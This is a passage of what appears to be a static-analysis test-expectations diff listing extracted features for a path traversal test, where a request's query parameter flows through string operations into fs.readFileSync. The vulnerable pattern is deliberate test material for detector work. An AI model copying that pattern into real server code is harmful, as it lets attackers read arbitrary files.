fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | exceptional return of fs.read ... str(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | exceptional return of fs.read ... str(4)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | exceptional return of fs.read ... str(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | exceptional return of fs.read ... str(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | exceptional return of fs.read ... str(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | fs.read ... str(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | fs.read ... str(4)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | fs.read ... str(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | fs.read ... str(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:2:10:32 | fs.read ... str(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:5:10:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:5:10:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:5:10:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:5:10:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:5:10:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:28 | path.substr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:28 | path.substr | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:28 | path.substr | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:28 | path.substr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:28 | path.substr | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | exceptional return of path.substr(4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | exceptional return of path.substr(4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | exceptional return of path.substr(4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | exceptional return of path.substr(4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | exceptional return of path.substr(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | calleeImports | fs | @@ -11303,6 +87189,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:10:18:10:31 | path.substr(4) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:10:23:10:28 | substr | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:10:23:10:28 | substr | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:10:23:10:28 | substr | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:10:23:10:28 | substr | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:10:23:10:28 | substr | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | CalleeFlexibleAccessPath | path.substr | | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | calleeImports | url | @@ -11312,6 +87203,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:10:30:10:30 | 4 | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | exceptional return of fs.read ... ice(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | exceptional return of fs.read ... ice(4)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | exceptional return of fs.read ... ice(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | exceptional return of fs.read ... ice(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | exceptional return of fs.read ... ice(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | fs.read ... ice(4)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | fs.read ... ice(4)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | fs.read ... ice(4)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | fs.read ... ice(4)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:2:11:31 | fs.read ... ice(4)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:5:11:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:5:11:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:5:11:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:5:11:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:5:11:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:27 | path.slice | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:27 | path.slice | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:27 | path.slice | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:27 | path.slice | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:27 | path.slice | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | exceptional return of path.slice(4) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | exceptional return of path.slice(4) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | exceptional return of path.slice(4) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | exceptional return of path.slice(4) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | exceptional return of path.slice(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | calleeImports | fs | @@ -11321,6 +87252,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:11:18:11:30 | path.slice(4) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:11:23:11:27 | slice | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:11:23:11:27 | slice | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:11:23:11:27 | slice | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:11:23:11:27 | slice | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:11:23:11:27 | slice | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | CalleeFlexibleAccessPath | path.slice | | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | calleeImports | url | @@ -11330,6 +87266,47 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:11:29:11:29 | 4 | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | exceptional return of fs.read ... known)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | exceptional return of fs.read ... known)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | exceptional return of fs.read ... known)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | exceptional return of fs.read ... known)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | exceptional return of fs.read ... known)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | fs.read ... known)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | fs.read ... known)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | fs.read ... known)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | fs.read ... known)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:2:13:38 | fs.read ... known)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:5:13:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:5:13:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:5:13:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:5:13:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:5:13:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:21 | path | stringConcatenatedWith | -endpoint- unknown | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:28 | path.concat | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:28 | path.concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:28 | path.concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:28 | path.concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:13:18:13:28 | path.concat | fileImports | fs 